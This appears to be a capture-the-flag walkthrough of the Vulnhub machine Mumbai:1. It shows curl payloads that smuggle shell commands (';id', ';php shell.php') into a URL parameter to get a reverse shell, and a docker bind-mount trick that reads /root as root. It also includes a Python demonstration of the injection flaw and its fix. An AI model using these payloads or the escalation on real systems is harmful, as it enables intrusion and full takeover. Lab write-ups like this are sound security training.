Mumbai:1 Vulnhub Walkthrough

Target machine:

    https://www.vulnhub.com/entry/mumbai-1,372/

Host discovery:

Host port scan:

Download the Note file from FTP:

    TODO:

    Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
    secure - maybe this will shut those security researchers up.

    Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
    rebuild the server again.

    - AbsoZed

In other words, Docker can be used for privilege escalation, because the HTTP servers run inside Docker containers.

HTTP directory scan:

    http://10.10.203.18/drupal/

The directory listing is empty.

http://10.10.203.18/wordpress/ cannot be accessed.

Next, enumerate the HTTP service on port 8000:

    dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml

    + http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
    + http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)

Download both files and inspect their contents.

Contents of test.php:

    Please POST a proper query. ex: https://caffeinatedengineers.com

keywords.py is the Python script that sends the request to the URL supplied in the query parameter.

Try requesting a few useful URLs:

$ curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]

$ curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)
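The `;id` above works because the query value is spliced into a shell command string on the server. The source of keywords.py is not reproduced on this page, so the following is an added example (not the box's code) that reproduces the pattern and its fix. Assumptions: the backend builds a command string from the POSTed `query` value and runs it through /bin/sh; to run offline, `printf` stands in for the real fetcher (curl/wget), and the injected command is `echo INJECTED` rather than `id`, which behaves the same way.

```python
"""Command injection via an unquoted URL argument, and two ways to close it.

Added example, not the walkthrough's keywords.py. `printf` stands in for the
real fetcher so the code runs offline; the `;` payload works identically.
"""
import shlex
import subprocess

# Constructed payload in the shape of the page's query=http://host/;id
PAYLOAD = "http://10.10.203.18/wordpress/;echo INJECTED"


def fetch_vulnerable(url: str) -> str:
    """Command built by string concatenation and run through /bin/sh.
    The `;` terminates the URL argument and starts a second command."""
    cmd = "printf 'fetching %s\\n' " + url  # user input spliced in raw
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def fetch_safe(url: str) -> str:
    """argv-list invocation with no shell: the whole string, metacharacters
    included, is delivered to printf as one argument."""
    proc = subprocess.run(["printf", "fetching %s\n", url],
                          capture_output=True, text=True)
    return proc.stdout


def fetch_quoted(url: str) -> str:
    """If a shell is unavoidable, shlex.quote() wraps the value in single
    quotes so the shell treats it as one word."""
    cmd = "printf 'fetching %s\\n' " + shlex.quote(url)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(fetch_vulnerable(PAYLOAD)))
    print("argv list :", repr(fetch_safe(PAYLOAD)))
    print("quoted    :", repr(fetch_quoted(PAYLOAD)))
```

The vulnerable variant prints the fetch line and then `INJECTED` on its own line (the second command ran); the other two print the payload verbatim as part of the URL and execute nothing else.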

The id output shows two things: the query value reaches a shell unescaped (command injection), and apiuser is a member of the docker group. Start a listener locally on port 1234:

Then run: curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php

With a shell as apiuser, attempt privilege escalation. The Docker daemon runs as root, so any member of the docker group can start a container that bind-mounts host paths and read them as root:

docker run -v /root:/mnt -it alpine

# cd /root/
~ # cd /mnt
/mnt # ls
proof.txt
/mnt # cat proof.txt
    OVER !!

Original article: https://www.cnblogs.com/hack404/p/12124777.html